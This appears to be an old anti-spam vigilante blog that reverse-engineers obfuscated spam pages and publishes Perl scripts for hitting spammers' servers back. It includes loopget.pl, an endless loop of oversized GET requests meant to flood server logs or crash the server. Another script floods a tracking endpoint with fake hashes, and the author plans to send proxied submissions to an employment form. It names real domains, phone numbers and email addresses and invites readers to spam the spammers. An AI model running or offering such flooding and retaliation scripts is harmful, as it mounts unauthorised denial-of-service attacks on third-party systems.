000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000=<br />

It takes a few seconds to generate too! Let's loop that a few times and see what happens.

OK that's looping. Now let's look at this wonderful crypto system. It's using an example pasted from the MSDN site on How to Store an Encrypted Connection
Essentially it's just base64 encoded with a cipher. So I know the input and output values and could just brute force my way through this. I'm going to investigate and see if there is a more elegant solution. Cryptanalysis is really not my strong suit.

UH OH!
.Error: 500 read timeout
Error: 500 Can't connect to www.bx.wc.com.bodpartatthe.com:80 (Bad hostname 'www.bx.wc.com.bodpartatthe.com')

I was probobly just firewalled off. Hey maybe that means I won't get anymore spam from them!! hooray!

BlingCash alias (http://goodangerlamb.com/wxv.php)

2005-02-23T18:18:00.000-05:00

Some may be fooled by the use of javascript encryption but the methods to defeat it and "unlock" what's inside are fairly trivial. In one of my earlier blogs I mention searching out "document.write" and then replacing it with "alert". This will just output the HTML into a harmless alert box that you can decipher on your own. Copying isn't possible though and this became sort of a pain. So I brushed off my ancient javascript foo and came up with this method which I find a little better. First wrap the <script> in a <form> and then create a textarea. instead of using "alert" use "formName.textArea.value=" which will fill in the text area for you. I will demonstrate this using the example below from BlingCash.

<br /><form name=o><br /><textarea name="box" cols=80 rows=30></textarea><br /><script language=JavaScript>function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,2,34,62,41,25,39,40,61,9,0,0,0,0,0,0,47,46,54,36,21,18,17,5,4,22,12,11,14,58,59,23,43,26,52,6,50,3,53,15,35,24,48,0,0,0,0,44,0,20,30,31,57,42,60,8,29,1,37,28,27,19,51,13,33,32,16,45,49,55,0,56,38,10,7);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.o.box.value+=(r)}}decrypt_p("5BkRg6fx@x5RJzhTv@9tzPJRF0dt9mfTL642FnkR9Ufx@xdtyzJuGefTSPfTFUkuFXJZKUoxzboZFU8VKOwZH6_VvcYpy@_Vv6JZSzsVFmfVFXdpOUkRrc8TGLJt9loZzI7TKzfVHK_VFmfVFXdpOUkRrc8TGLJt9loZzI7TKl_TKzoZhzoTv@JRYbwVvzoRO@kpUmkTIUfpGefTIUkTvlkRIzotOzoxzboZFU8VKOwZH6_VvcYpy@kZOm_ZIzotOzoxzboZFU8VKOwZH6_VvcYpzK_ty6_TOXdpSI5jDI5jDbYp9UfZFXJtOKJnKXdpDbYpFPkVgmfV1nfTYbYjzIgTHcsZJ@_RJzkRoXdpDbYpgmfV1nfToUJn1ukRYbYjzIYRvuhRYb7pXW3wXW3wzAdP@x5RHckTvOwtychZvcoxzIdpGyonizhnYbgjDI9qzI7tv6kTIOotSnfT1XdpDbYpSUkT9OotizJnKKJxzIdpGBJZJKknFXdpaI5jvbwx@IYp5S8Vl3QpGIYp5ShZGEkTJKfTYb7tv@kRvc8pGLot9n_ZKXdpFPkVzAdPGIYpGIYp5QJZKzoZO@dPGIYpGIYp5Sotz6JZGyonizhnYbgjDI9qzI7VFnhTvXdpzPfViUfVgSsTD05paIhuGQsT9nkZGQwCmLdCmL46Gb_TOzJZOXwtyzhRyXf6GE5VhO7Vy6JniO7pmLdCmLdCzAdPGIYpGIYpGIYxFc8x@IYpGIYpGIYpGIYxFzkpzK_ty6_TOXdpSI5jDI4jqcYpH6Jn1@JxzQJZKzoZOcwx5L_TKzhpInfuvXdpObYpSPkTycoxzQwwXW3wXW3pGLJtSUJxzSWtoPJTHcwxTm38Pn3M205ptuJZGL_T96_TEnfT1O7VJzoZGQ_TKzotJ@_VGQWw8UWd46L0g1b0V6LNxnbfG2JtFUfVJmkT5ewZy@kRlx42Fzfx@IYpGIYpGIYp5eYRO@dPGIYpGIYp5eYRHckTv@dPGIYpGIYp5bfVl3QpGIYpGIYxUnJZ9z_VvzhpIzou9UJxzIotizJnKKf6Gb5VhN5pEnkZFuf6O19qbIYnvn_Zoz86rI5Vhcwx@IYpGIYpGxdtO@5xSUfTFUfVlx9RlxdZy@kRGefTS6JnSNJxzSsTD@YTylJtFn_TK@YnOUfZYyYnFzhVce72EKsRKbkTJ@_ZSm_Vo@7tyX_2vuonFP7Vvz_21bYpIzou9UJxzQJROlsTO05nH@kZzI7VJ0oZYbYCzIwZHlJZYbwfvchZH@JtzI7ty6_TOXdpSLdCkTdwXcwx5bfxq@bfqccptuLwGQWNtUbxybfx5ewZy@kRlx42r@5xyQJZKzoZO@5xzc8x@IYpGIYpGx42UnJZ9z_Vvz8x@IYpGIYxyShZl3QpGx42Fc8x@IYp5S8Vl3QpGIYp5ShZGEkTJKfTYb7tv@kRvc8pGLot9n_ZKXdpzPkRFPJTzAdPGIYpGIYp5bfVlxdtO@dPGIYpGIYp5bfVlxdtO@dPGIYpGIYp5L_TKzhpUm_tvXdptmknyXJtzI7VJ0oZYbwjzAdwychpHcJRIUkpSPJTD6JtJ@kRI6YpvXJtJ6kp5EkpIzou9UJxzSoZhzo2iU_tycotFn_TK05pr@kZvchTJ@JZbI7ty6_TO05pSLdCkTdwXcYpocoZUXdpgmJn9zsTcEftrloZjuJRKzsVmnkT9U_ty@_Vr6kRH@kRI@7tyXfplEftrloZjuJRKzsVmnkT9U_ty@_Vr6kRH@kRI@7tyXkxyEfx5ewZy@kRlxdtO@dPGIYpGIYp5L_TKzhpUm_tvXdptmknyXJtzI7VJ0oZYbwjzA5fyOwVvX_TmUkpkPJROloZ9WkpUcsTgOgt96kpUUhRrcoZG2JtJ6JnKK_V9IgZgmJn9OYxHO7VFnhTvXdpFUkuFXYZvl_TOmkRJPfTcIgRKzJZO6JnKU_6GQ_T9PfVcI7pmL96kL3wzIYnOUfZYbgTHnkTFPf6OUJTyWoZjuJRKzsVmnkT9U_ty@_Vr6kRH@kRI@7tyXfplboZgPfRvObnr@kRIWon96JZSPfTIUhTFmfTFl82SPJT5egtlx42UPfTF@dPGIYpGIYp5e7tv@kRvc8x@IYpGIYpGxdtO@5xzc8x@IYpGIYpGxdtO@5xzc8x@IYpGIYpGxdtO@5xzc8x@IYpGIYpGxdtO@5xzc8x@IYpGIYxyShZl3QpGx42Fc8x@x42Fmft9Ufx@3Qxyb_Tin8x@x42ozoT9@dP")</script><br /></form><br />

Much easier to deal with in this way. I've been toying around in perl with different types of "annoying" things to do. The first is to fill in values for parameters with the max data (around 32K I think). You'll know you've gone way too far when you get a 414 error which suggests the max URI size has been exceeded.
It is preferable to see that message and then back off a little to you get a 302 or some other error. The idea is that while running in a loop the entire thing is logged into the web servers error logs. Eventually this will make the logs
1) uselessly cluttered with errors
2) possibly overflow and stop the server

I normally use this as filler
my $message="STOP SPAMMING STOP SPAMMING STOP SPAMMING STOP SPAMMING" x 100;

So the following is my loopget.pl script which politely asks the spammer to stop spamming me

#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;

#copyright 2005 spamhunter
#but uh feel free to use this for your own spam hunting adventures.
#no really it's ok

my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/8.0");
my $message="STOP SPAMMING STOP SPAMMING STOP SPAMMING STOP SPAMMING" x 100;

my $baseURL='http://www.blingcash.com/hit.php?w=' . $message;

sub sendRequest
{
my $target=shift;
my $url=$target;
my $req = HTTP::Request->new(GET => "$url");
$req->header('Accept' => 'text/html'); # send request
my $res = $ua->request($req); # check the outcome
if ($res->is_success)
{
return $res->content;
}
else
{
return "Error: " . $res->status_line . "\n";
}
}

while (1)
{
print sendRequest($baseURL);
}

Are you people even TRYING anymore?

2004-09-13T16:28:00.000-04:00

I get a spam today from "Kenneth" with a subject line of "It's me, Delilah ODL8710369 from AOL 8d". Come one man, at least make the names match, or make them varients, or at the very least....make them the same gender.

Self Milking Girls

2004-09-11T21:46:00.000-04:00

Return-Path:
Delivered-To: john@
Received: (qmail 8544 invoked from network); 11 Sep 2004 03:15:12 -0000
Received: from unknown (HELO pD958B23B.dip.t-dialin.net) (217.88.178.59)
by 2.69-93-235.reverse.theplanet.com with SMTP; 11 Sep 2004 03:15:12 -0000
Received: from starmedia.com (mx1.latinmail.com [62.37.236.140])
by pD958B23B.dip.t-dialin.net (Postfix) with ESMTP id 6E2B185318
for ; Fri, 10 Sep 2004 20:15:12 -0700
Message-ID: <000001c497ad$83f4dc23$310f11c9@starmedia.com>
From: "Jas R. Chrian"
To: John
Subject: Self milking girls
Date: Fri, 10 Sep 2004 20:15:12 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0024_55E89199.1ABD4F86"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.4682
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2479.0006
X-Virus-Scanned: by AMaViS perl-11 mion

there is no shortage of spammers to go after. I haven't even deployed my troll addresses yet but that will be covered in another post. This one is using the same targeting technique of hashes but this time it's embedded in the server name itself.
Again the actual hashes have been modified but the number of characters is preserved
http://Hereford.45839583945867393045.handicaps.hdhda.com/rd/eESw8odWRZ/mekl43WEBDeiw.htm
I'll have to modify my falsePozi.pl script later to work for this scumbag.
Hrm this one is a little tricker and I received a 404. Must be something in the hashes that I messed up.

OK let's work backwards here, inurl:hdhda.com didn't find anything on google. but the whois revealed this

Registrant:
Masterly Intl S.A.
Sabana sur
25mts al sur del
Supermercado AM PM
San Jose, CR --
CR
+011.5068246415
Fax:+011.5062722279

Domain Name: HDHDA.COM

Administrative Contact:
Admin, Domain masterlyintl@hushmail.com
Sabana sur
25mts al sur del
Supermercado AM PM
San Jose, CR --
CR
+011.5068246415
Fax:+011.5062722279

Technical Contact:
Admin, Domain masterlyintl@hushmail.com
Sabana sur
25mts al sur del
Supermercado AM PM
San Jose, CR --
CR
+011.5068246415
Fax:+011.5062722279

Record expires on 09-02-2005
Record created on 09-02-2004

Domain servers in listed order:
NS0.CLEANWEBFILES.COM 64.38.198.11
NS1.CLEANWEBFILES.COM 64.38.198.13

There was another URL in the email so let's try to work with that one
http://exclamation.00000000000000000000.spotty.hdhda.com/rd/xxxxxxxxxx/xxxxxxxxxxxxxxxx.HTM
OK this isn't work, so I went to usenet and found an an abuse posting that gave another address not linked to mine. So let's try it out instead
http://Cecropia.321908402677499182.plead.hdhda.com
another 404, I'm guessing because I don't have the hashes at the end of the URL.
Bingo, got it!
Another post had munged up the address and it still worked.
http://unevaluated.530896695780071931.poodle.hdhda.com/rd/UrHaeRXA4a/yY389QLQcc5AbG1.HTML

the page lists itself as "HELMY Enterprises, Inc." althought I doubt this moron actually files papers and has a DBA. Just a guess though.
there's an affliliate link on the bottom for http://www.gigacash.com which I'll check out later.
the link to it is another candidate for falsePozi.pl
http://www2.gigacash.com/popup/gc.php?gcaid=188234&gcsa=default

Helmy enterprises actually has a website if you can believe that.
I've linked to the google cache to make this more discreet
http://64.233.161.104/search?q=cache:VM3pMCl7uMAJ:helmy.com/+HELMY+Enterprises,+Inc.&hl=en
Here is our scumbags email addy according to the site
info2@helmy.com
email@helmy.com

The address is just a PO Box in Los Angeles

US & Canada: 888.8.HELMYS

International: 310.820.0228

PO BOX 492146, LA, CA 90049

OH wait it gets better, an employment page! Oh yes can I please work for you? I mean I have never had a job where I am considered by most to be the slime of the earth.
Let's have some fun with this now.

Now the way most forms work is they have a bunch of fields and then there is an "action" field which tells you where it's going to go. This one requires only slightly more work in that it's using POST so I can't just make a big URL and shove it down his digital throat.
In this case the relevent data is as follows

<form method="POST" action="FormMail.pl5">
<input type="text" name="name" size="40" value="">
<input type="text" name="email" size="40">
<input type="text" name="phone" size="40">
<textarea name="comments" rows="5" cols="31"></textarea>
<input type=HIDDEN name="recipient" value="email@helmy.com">
<input type=HIDDEN name="subject" value="HELMY Employment Inquiry Form">
<input type=HIDDEN name="redirect" value="http://www.helmy.com">
<input type=HIDDEN name="required" value="name, email">
<input type="submit" value=">> send" name="B12">

So this employment application goes right to his email. interesting, spamming a known spammer.. the irony is too much sometimes.
alright let's get to work here, I need to create a modified HTTPsend.pl script so I can send in my work request. I'm also going to have to hide my request by going through an anonymous proxy so he doesn't just check his logs tomorrow and blag my IP address. It will all be documented in the next post so stay tuned (not that anyone is actually reading this).

Creating false positives for spammers

2004-09-11T20:05:00.000-04:00

Since he is trying to figure out who is "live" in his spam rolodex let's have a little fun.
The first tool to use would be a random text generator or in this case a simple encoder.
We don't need truely random here so Mime64 encoded using localtime() output will work just fine.

So here is what I came up with for blingcash so far

#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
use MIME::Base64;

my $text= "spammersuck";

# Create a user agent object
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/8.0"); # pretend we are very capable browser :)

my $baseURL='http://birdgenus.com/web09.php/';

sub getPage
{
my $key = localtime();
#removing anything that is not a digit
$key=~s/\D//g;
$key=rand($key);
my $encoded = encode_base64("$key:$text");

#original email had a 16 char hash so just making sure mine is similar
my $hash=substr($encoded,0,15);

my $req = HTTP::Request->new(GET => $baseURL.$hash);
$req->header('Accept' => 'text/html');

# Pass request to the user agent and get a response back
my $res = $ua->request($req);

# Check the outcome of the response
if ($res->is_success) {
print $hash . " " .$res->status_line . "\n";
}
else {
print "Error: " . $res->as_string . "\n" if ($res->status_line!~/404/);
}
}

foreach my $try (1..5)
{
getPage();
}

hey from teenie

2004-09-11T19:51:00.000-04:00

New format here, I will post the headers first and the results afterwards. This may make it easier later on if this blog ever gets viewed by another person.
Return-Path:
Delivered-To: john@
Received: (qmail 17769 invoked from network); 11 Sep 2004 16:17:26 -0000
Received: from unknown (HELO felicite.kwiksuzie.com) (209.200.9.148)
by 2.69-93-235.reverse.theplanet.com with SMTP; 11 Sep 2004 16:17:26 -0000
Received: from mail pickup service by megamarge.com with Microsoft SMTPSVC;
Sun, 12 Sep 2004 00:05:26 -0800
Received: from 197.208.117.20 by by7fd.bay7.megamarge.com with HTTP;
Sun, 12 Sep 2004 00:05:26 GMT
X-Originating-IP: [197.208.117.20]
X-Originating-Email: [teeniefgcd@megamarge.com]
X-Sender: teeniefgcd@megamarge.com
From: teenie
To: John
Subject: hey
Date: 12 Sep 2004 00:05:26 -0400
Mime-Version: 1.0
Content-type: text/html
Message-ID:
Return-Path:

This spammer is using the same type of stealthing techniques, random dictionary words, url encoding and a targeted URL.

the URL's are designed to tie back to the email address like a hash. In fact this probobly is a hashed value which is tied to a database entry.
http://birdgenus.com/web09.php/REWDgUhozXE482E
I've obviously changed this value around a little. In fact one of the perl scripts I love using makes random values which will cause lots of false positives in their database.

Hrm the result looks awefully familiar. Just like the one I saw in my first post. It may even be the exact same person respamming me. It's not like these spammers have morals or ethics.
Ya it's the same guy from http://www.blingcash.com. I used the same technique as last time, take the script shown below and change document.write to alert and view the content safely.
I've been thinking of changing to this to populating a text field so I can easily cut and past the results.

<br /><script language=JavaScript>function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,20,2,21,43,60,61,62,6,42,0,0,0,0,0,0,34,50,52,1,46,59,17,4,57,56,26,27,15,39,25,12,10,18,7,58,54,47,40,28,9,41,49,0,0,0,0,51,0,55,13,36,35,16,23,0,3,44,30,45,19,24,32,33,37,5,11,31,38,8,14,48,53,22,29);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("NTWBuM5tUtNBORzAgUXZR4OBF0HZXl5AvMY@F_WBXh5tUtHIalvSnKLIZfIxPrkxmjmpX7IoqjiAfROwfdNpqv5xGdOwR45xCh5xmyNohsbZuhix3liZOUiwmyNoPUWSPlWwmjVSR0OtPfbwraVnbRzB30Y@PPkBQUIZX_5A2KOZya5@84OAP2WaORk@gak@2tmo22WaORknXPmBP4WARl5xmyN@uh5AesOZfdNpXJkZf4WAXsOZfKbt1tmAPKOZF_iArdXpXJzBGRbBydXpXjbwy_5aGsWAgdXpX8kA3dNpXtOwhRbt3tVBORWBbdNM3yN@bhO_2aWBmvNp3tVx8sbwgUW0mQN@yK5xgh5A5dXp2AVM9s5_rjWAeszdOSHoK7JtdsLHVhjoyskZmjuZR4OBF0HZXl5AvsmorlOAgdHo34WxRyIwflOAgsiAfROwfdNpq@OZfrO_rrb_CRz_myNoul5x2_5AbhO_2aWBmyNor45xgKb_sh5tUtHIalvSnfVxfKOtRTWBFf6MP9VBQr6@RMO_rriZGKz_rJiAu4m_OR6@3aWxJPbt1yNp3yNphJbtzvmxmjHoqDOZuhOtRP6oqv5xGdOwR45xCh5xmyNoul5x2_5AQ_WwFaOt3yuAGskwOUW_g_iwbRbt3yIAPsbwy_5agUH4N9IIalvSnKLIZUH4N9m_FdWAK2")</script><br />

I've already covered blingcash.com so let's move on to another one.

my methods

2004-09-11T19:37:00.000-04:00

I wanted to spend some time documenting my methods. I only use freeware tools at this point such as perl, outlook express and vim.
Outlook Express is my collector, it is cofigured for the catch all address of my domain. For every oddball site I've ever gone to I would enter a custom email. In one case MPCMag who offered free magazine subscriptions the spam would get sent to MPCMag@mydomain.com
Once the spams are in my inbox (with previewing turned off of course) I would simply click on the file and hold, drag it onto my desktop and then edit the file using vim. Vim is VI improved for those who don't know and is a great free text editor.
The non free tool I use to speed things up are Komodo a fantastic perl IDE I purchased a year ago from Activestate (now Sophos). I could do without it but I really love the tool and it is nice when I'm coding to have an interactive debugger like this handy.

The normal mode of operation here is to find a page of entry which is usually in the email itself and then download the page in my perl script. This prevents any nasty activeX or other surprises from infecting me. In linux I would use curl for this of course.
Here is a sample perl script I use.

#!/usr/bin/perl
use strict;

use LWP::UserAgent;

# Create a user agent object
my $ua = LWP::UserAgent->new;
# $ua->agent("$0/0.1 " . $ua->agent);
$ua->agent("Mozilla/8.0"); # pretend we are very capable browser :)
my $counter;
# Initialize proxy settings from environment variables
$ua->env_proxy;
my @dictionary;
# Create a request

# this is an actual spammer URL that was sent to a troll account
my $baseURL='http://www.ad0u.com/maildeny.php';

sub getPage
{
my $req = HTTP::Request->new(GET => $baseURL);
$req->header('Accept' => 'text/html');

# Pass request to the user agent and get a response back
my $res = $ua->request($req);

# Check the outcome of the response
if ($res->is_success) {
print $res->content;
}
else {
print "Error: " . $res->status_line . "\n" if ($res->status_line!~/404/);
}
}

getPage();

First Post

2004-09-09T00:15:00.000-04:00

Spam Hunting is a new sport I've decided to engage in. I know of others who do this in one way or another. Some play as dirty as the spammers but since I'm cataloging this I'll obviously stay clean.
My first piece of spam was from a bounce account on my domain. Bounce accounts are accounts friends used to have on my domain and have discontinued. But the spammers don't know that and still send junk their way. There is a lot of cat and mouse games with these scum such as encrypting pages using scripts.
Our first came in a strange letter that just said Hi in the subject.
[note: for obvious reasons I removed the address of the recipient but feel free to spam the spammer :) ]
the actual text of the message is encoded using HTML encoding (&xx;) with random dictionary words peppered in comment tags. It points to a site http://goedog.com/

So I fire up my trusty perl debugger from and pull down the page. I would use curl if I had my linux box up but I'm at my work laptop so windows it is.
The result is a single line of javascript with an encoded page. It's meant to keep prying eyes away from the inner workings. Pretty lame though. So I paste this into my HTML editor and change a single piece. Instead of document.write now it will use document.alert. So the HTML will not render but show up in a pop up box.

<br /><script language="JavaScript">function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,3,57,58,6,52,39,47,33,45,0,0,0,0,0,0,10,22,4,5,32,28,35,55,31,19,1,8,15,17,16,36,24,38,13,21,43,56,20,18,37,30,2,0,0,0,0,25,0,42,27,49,46,9,11,41,48,23,50,14,59,54,29,40,44,0,51,7,34,62,53,12,61,60,26);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=string.fromcharcode(165^w&255);w>>=8;s-=2}else{s=6}}alert(r)}}decrypt_p("_mE5K6yQ7Q_5wsnjq7ecsTw5M02ceIyjk6gtMrE5e1yQ7Q2UGIk3DbLUciUv@f9vPYPXeuU8CYpjiswhiF_XCkyvBFwhsTyvJ1yvPA_81HRcK1pvSIpcw7phPA_8@7E3@IEhPYo3s0wQ@iRhfGoDRsn5S0gt@@95W7UceryjZbwcAGyt4Twj@ZEGws9tqG9tZQP8ZZEGws9De@P5@TEjsIyvPA_tK1yjNHwciF_Xez9ciTEjeHwcibRQVQPj@bwcMrpjfFeXezn5BsR5AFeXeYRhAryGBHEjqFeXe49jSF_XeQwh1sRQSQo5wsE5RF_6SA_tR1wrZGE5Pk_XSQov4HRhq7E0PW_tAbyvq1yjyFeXZjo6aHyrfYEjNHnFw328buzQFHL2o1Y8AH9cPYKcsTw5M02ceIyjkHP8fIwjqF28STEvsAUhiIwjqHpjiswhiF_XCtwcifwrffRrJsnrPA_8KIyvZryjR1wrZGE5PA_8fTyvqbRrH1yQ7Q2UGIk3DiovibwQsmE5Mix6@ao5Wfxts6wrffpcBbnrfzpjKTPrwsxtSGEvz@RQVA_XSA_X1zRQnkPvPY28CdwcK1wQs@x8CkyvBFwhsTyvJ1yvPA_8KIyvZryjWrEhMGwQSAKjBH9hw7ErqrphRsRQSAUj@HRhAryGq72T_aUUGIk3DbLUc72T_aPrMFEjbZ")</script><br />

The page of course points to yet another site, http://www.blingcash.com/
[urls]
http://www.blingcash.com/exit/ex/
http://www.blingcash.com/hit.php?w=100000&s=8&p=2

Blingcash seems to be nothing more then a porn site, however once you start playing with the variables new pages appear.

The title of the page, BlingCash.com ::: Covert Like the Ole' Days!
Ya the good ole days..
Here was something disturbing. It was targeted to people that were part of the reseller (spamming) program. In particular
"
What happens when your Epoch customer cancels

his membership with your paysite? Simply send

him one of our new cross sale mailers...a

single click later and you've earned $15.

Let us show you how to profit off cancellations!

CLICK HERE to learn more!
"

From there I found a contact page!

US Phone:
(702) 547-0900

Canada Phone:
(416) 691-2812

Marketing Email:
sales@blingcash.com

Support Email:
support@blingcash.com

ICQ Contact :
96944506

OK I'll play. Let's talk to the scum bag and see what he says.

Return-Path:
Delivered-To: john@com
Received: (qmail 22370 invoked from network); 9 Sep 2004 00:42:03 -0000
Received: from unknown (HELO bebe.sylviidae.com) (209.200.9.195)
by 2.69-93-235.reverse.theplanet.com with SMTP; 9 Sep 2004 00:42:03 -0000
Received: from mail pickup service by citysilvia.com with Microsoft SMTPSVC;
Thu, 9 Sep 2004 08:50:47 -0800
Received: from 104.106.80.174 by by7fd.bay7.citysilvia.com with HTTP;
Thu, 9 Sep 2004 08:50:47 GMT
X-Originating-IP: [104.106.80.174]
X-Originating-Email: [Merryxeqh@citysilvia.com]
X-Sender: Merryxeqh@citysilvia.com
From: Merry
To: John
Subject: hi
Date: 9 Sep 2004 08:50:47 -0400
Mime-Version: 1.0
Content-type: text/html
Message-ID:
Return-Path: